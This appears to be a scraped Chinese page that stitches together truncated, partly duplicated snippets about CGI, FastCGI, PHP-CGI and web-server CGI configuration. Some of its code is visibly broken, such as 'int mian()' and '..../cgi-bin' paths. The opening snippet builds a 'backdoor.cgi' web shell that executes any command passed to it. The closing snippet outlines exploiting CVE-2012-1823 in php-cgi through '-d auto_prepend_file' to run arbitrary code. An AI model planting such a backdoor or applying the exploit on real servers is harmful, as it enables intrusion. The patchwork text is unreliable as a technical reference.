关于CGI程序的几个疑问。
cd /tmp mkdir cgi-bin echo '#!/bin/bash' > ..../cgi-bin/backdoor.cgi echo 'echo -e "Content-Type: text/plain\n\n"' >> ..../cgi-bin/backdoor.cgi echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi chmod +x ..../cgi-bin/backdoor.cgi python -m http.server --cgi wget -q -O - "http://localhost:8000/cgi-bin/backdoor.cgi
Web服务器和CGI接口又另外设置了一些环境变量,用来向CGI程序传递一些重要的参 数。CGI的GET方法还通过环境变量QUERY-STRING向CGI程序传递Form中的数据。...lighttpd 配置 cgi, 打开cgi.conf, cgi.assign = (".cgi" => "") 设置 cgi 模块的扩展名和解释器。...下面是 test.c 代码: #include "stdio.h" #include "stdlib.h" #include int mian() { char *data...cgi 与 fastcgi CGI工作原理:每当客户请求CGI的时候,WEB服务器就请求操作系统生成一个新的CGI解释器进程(如php-cgi.exe),CGI 的一个进程则处理完一个请求后退出,下一个请求来时再创建新进程...在CGI模式中,php-cgi在此便退出了。
cookie操作:限制4kb,300个,每个域名20个 image.png cgi.escape image.png urllib.parse.quote_plus unquote_plus...image.png open().read() HTMLParser().unescape() image.png cgi.FieldStorage() xx.keys() image.png
PHP-CGI 是 PHP 的 CGI 版本,它可以让 PHP 脚本在 Web 服务器上运行,但由于 CGI 的低效率,PHP-CGI 的性能也比较低。...众所周知,CGI 解释器的反复加载是 CGI 性能低下的主要原因(fork-and-execute),如果 CGI 解释器保持在内存中并接受 FastCGI 进程管理器调度,则可以提供良好的性能、伸缩性...PHP-CGI PHP-CGI 只是个 CGI 程序,他自己本身只能解析请求,返回结果,不会进程管理。...PHP-CGI 的不足:PHP-CGI 变更 php.ini 配置后需重启 PHP-CGI 才能让新的 php-ini 生效,不可以平滑重启。直接杀死 PHP-CGI 进程,PHP 就不能运行了。...你说中文(PHP 代码),他说爱斯基摩语(C 代码),互相听不懂,怎么办?那就都把各自说的话转换成英语(FastCGI 协议)吧。 怎么转换呢?
定义 cgi 通用网关接口,外部程序与web服务器之间的接口标准,是在cgi程序和web服务器之间传递信息的过程 每一次请求都会生成一个cgi进程,cgi程序执行完,进程退出 独立于服务器、独立编程语言...可以同时处理多个请求 长期占用内存 php-cgi php官方自带的FastCGI 进程管理器 php.ini修改之后,必须kill掉php-cgi再启动php.ini 才生效。...以apache为例,首先要配置好cgi访问目录,访问 http://127.0.0.1/cgi-bin/printenv.pl 。...apache收到用户请求,开始调用cgi接口,处理cgi程序(printenv.pl),处理完了之后返回 cgi程序处理后的结果。...说一下我走过的一个坑,为了验证cgi程序,我特意编译了apache2.4 ,然后配置httpd.conf 但是访问cgi程序还是报错。主要原因就是。cgi文件,没有加上调用哪个程序执行 。
CGI 即 Common Gateway Interface,译作“通用网关接口” web服务器所处理的内容都是静态的,要想处理动态内容,需要依赖于web应用程序,如php、jsp、python、perl...它所依赖的就是cgi协议。没错,是协议,也就是web server和web应用程序交流时的规范。...web server会将这些程序参数和其它一些环境变量根据cgi协议通过TCP或套接字等方式传递给已启动的cgi程序(可能是cgi进程,或者是已加载的模块cgi模块)。...当cgi进程接收到web server的请求后,调用search程序并执行,同时还会传递参数给search程序。...search执行结束后,cgi进程/线程将处理结果返回给web server,web server再返回给浏览器。
FastCGI与CGI特点 CGI,FastCGI也具有语言无关性。 CGI, FastCGI在进程中的应用程序,独立于核心web服务器运行,提供了一个比API更安全的环境。...(APIs把应用程序的代码与核心的web服务器链接在一起,这意味着在一个错误的API的应用程序可能会损坏其他应用程序或核心服务器; 恶意的API的应用程序代码甚至可以窃取另一个应用程序或核心服务器的密钥...FastCGI技术目前支持语言有:C/C++、Java、Perl、Tcl、Python、SmallTalk、Ruby等。...启动PHP-CGI,使用如下命令: php-cgi -b 127.0.0.1:9000 PHP-CGI的不足 php-cgi变更php.ini配置后需重启php-cgi才能让新的php-ini生效,不可以平滑重启...PHP-FPM其实是PHP源代码的一个补丁,旨在将FastCGI进程管理整合进PHP包中。必须将它patch到你的PHP源代码中,在编译安装PHP后才可以使用。
Web服务器和CGI接口又另外设置了一些环境变量,用来向CGI程序传递一些重要的参 数。CGI的GET方法还通过环境变量QUERY-STRING向CGI程序传递Form中的数据。...lighttpd 配置 cgi, 打开cgi.conf, cgi.assign = (“.cgi” => “”) 设置 cgi 模块的扩展名和解释器。...下面是 test.c 代码: #include "stdio.h" #include "stdlib.h" #include int mian() { char *data; data...cgi 与 fastcgi CGI工作原理:每当客户请求CGI的时候,WEB服务器就请求操作系统生成一个新的CGI解释器进程(如php-cgi.exe),CGI 的一个进程则处理完一个请求后退出,下一个请求来时再创建新进程...在CGI模式中,php-cgi在此便退出了。
修改apache配置文件如下 AllowOverride None Options...Order allow,deny Allow from all AddType text/html .htm .html .py AddHandler cgi-script....cgi .py 编写hello_get.py,放在/usr/local/sae/httpd/htdocs/cgi-bin/目录下,赋予权限chmod a+x hello_get.py 代码: #!.../usr/bin/python import cgi import os import time import cStringIO import json form = cgi.FieldStorage
众所周知,CGI解 释器的反复加载是CGI性能低下的主要原因,如果CGI解释器保持在内存中并接受FastCGI进程管理器调度,则可以提供良好的性能、伸缩性、 Fail- Over特性等等。...APIs把应用程序的代码与核心的web服务 器链接在一起,这意味着在一个错误的API的应用程序可能会损坏其他应用程序或核心服务器。...恶意的API的应用程序代码甚至可以窃取另一个应用程序或核心服务器的密钥。 FastCGI技术目前支持语言有:C/C++、Java、Perl、Tcl、Python、SmallTalk、Ruby等。...PHP-CGI的不足: php-cgi变更php.ini配置后需重启php-cgi才能让新的php-ini生效,不可以平滑重启。 直接杀死php-cgi进程,php就不能运行了。...PHP-FPM其实是PHP源代码的一个补丁,旨在将FastCGI进程管理整合进PHP包中。必须将它patch到你的PHP源代码中,在编译安装PHP后才可以使用。
问题背景我在 public-html 中运行了表单,并在 cgi-bin 中运行了 cgi 脚本。当我提交表单时,我收到一个空白页面。...以下是修改后的代码,在其中应用了第一种解决方案:#!.../usr/bin/python# Import modules for CGI handlingimport cgi, cgitb, sys# Create instance of FieldStorageform...The Values Selected are %s, %s, %s " % (tier, version, point))print("")print("")代码示例以下是完整的工作代码...出现这些问题的原因可能是多种多样的,但最常见的原因之一是代码中存在语法错误或逻辑错误。通过仔细检查代码并确保其正确无误,可以避免这些问题。
配置Nginx支持CGI 相信会特意看这篇文章的人对CGI是什么及其作用已经有了足够的了解,所以在这里不再赘述,直接开始配置。.../.*\.cgi$ { root /work/www/test; fastcgi_index index.cgi; fastcgi_param SCRIPT_FILENAME $...fastcgi_params.default/etc/nginx/nginx_fcgi_params 到这里其实已经完成工作了,但我现在的公司需要在网页上能够显示数学公式,所以,以下两步是添加一个名为mimetex.cgi...(可以在网上下载)的文件到/web/www/cgi-bin(如果没有此目录,请手动创建)下,有了这个文件系统才能将用户提交的“文本格式的公式”转换成“真正的公式” mkdir /etc/nginx cd.../web/www/cgi-bin/ chmod +x mimetex.cgi
/usr/bin/python # CGI处理模块 from os import environ import cgi, cgitb # 创建 FieldStorage 的实例化 form = cgi.FieldStorage...print("Set-Cookie:Path=/perl;\n") print('') print('') print('Hello Word - First CGI...This is my first CGI program') print("Hello %s %s" % (first_name, last_name)) print("User
众所周知,CGI解释器的 反复加载是CGI性能低下的主要原因,如果CGI解释器保持在内存中并接受FastCGI进程管理器调度,则可以提供良好的性能、伸缩性、Fail- Over特性等等。...(APIs把应用程序的代码与核心的web服务器链接在一起,这意味着在一个错误的API的应用程序可能会损坏其他应用程序或核心服务器; 恶意的API的应用程序代码甚至可以窃取另一个应用程序或核心服务器的密钥...3、FastCGI技术目前支持语言有:C/C++、Java、Perl、Tcl、Python、SmallTalk、Ruby等。...管理器 PHP-CGI的不足 1、php-cgi变更php.ini配置后需重启php-cgi才能让新的php-ini生效,不可以平滑重启 2、直接杀死php-cgi进程,php就不能运行了。...PHP-FPM其实是PHP源代码的一个补丁,旨在将FastCGI进程管理整合进PHP包中。必须将它patch到你的PHP源代码中,在编译安装PHP后才可以使用。
虽然我们听说过Java的Servlet,Python的WSGI。但其实Java、Python都是支持CGI的,不仅如此,其他我们所熟知的语言大都也都支持。...CGI程序既是如此。 CGI程序通常部署到Web服务器(如Apache)上,Web服务器然后调用CGI程序,关于CGI程序到底如何从Web服务器中获得输入,请继续阅读下一节 Interface。...此时要注意的是,不要以为返回HTML页面,那么直接输出一段HTML代码就OK,注意。此时CGI的输出承担的是HTTP协议的响应部分,因此HTTP响应报头也要自己标准输出出来。...熟悉PHP的同学,肯定echo过HTML代码,没错,这很像。...Java发明的Servlet技术也是一种常驻内存的网关通信技术,只不过它采用的是多线程而非进程。
/"这个指令,指示了默认的cgi-bin的路径。...还需要配置 AddHandler cgi-script .cgi .pl 该配置默认被注释掉了,设置了cgi的后缀名 编写一个cgi文件,内容如下: #!...将该文件命名为first.cgi,然后放入/var/www/cgi-bin/目录中。...: first.cgi 说明了权限被拒绝了。...将first.cgi的权限设置成755 chmod 755 /var/www/cgi-bin/first.cgi 再次运行http://localhost:9000/cgi-bin/first.cgi,
一、CGI概述 1、CGI简介 CGI(Common Gateway Interface) 是WWW技术中最重要的技术之一,有着不可替代的重要地位。...CGI是外部应用程序(CGI程序)与Web服务器之间的接口标准,是在CGI程序和Web服务器之间传递信息的过程。...asp,php,jsp 二、python CGI编程 1、web服务器支持及配置 在你进行CGI编程前,确保您的Web服务器支持CGI及已经配置了CGI的处理程序。...这个目录被称为CGI目录,并按照惯例,它被命名为/var/www/cgi-bin目录。 CGI文件的扩展名为.cgi,python也可以使用.py扩展名。...6、简单的表单实例:GET方法 以下是一个通过HTML的表单使用GET方法向服务器发送两个数据,提交的服务器脚本同样是cgi_get.py文件,cgi_get.html 代码如下: [root
CVE-2012-1823出来时据说是“PHP远程代码执行漏洞”,曾经也“轰动一时”,当时的我只是刚踏入安全门的一个小菜,直到前段时间tomato师傅让我看一个案例,我才想起来这个漏洞。...php有一个叫php-cgi的sapi,php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。...CVE-2012-1823就是php-cgi这个sapi出现的漏洞,我上面介绍了php-cgi提供的两种运行方式:cgi和fastcgi,本漏洞只出现在以cgi模式运行的php中。.../usr/local/bin/php-cgi -d include_path=/path的写法来进行测试,认为不应该限制php-cgi接受命令行参数,而且这个功能不和其他代码有任何冲突。...但阅读过我写的fastcgi那篇文章的同学应该很快就想到了一个更好的利用方法:通过使用-d指定auto_prepend_file来制造任意文件包含漏洞,执行任意代码: ?
领取专属 10元无门槛券
手把手带您无忧上云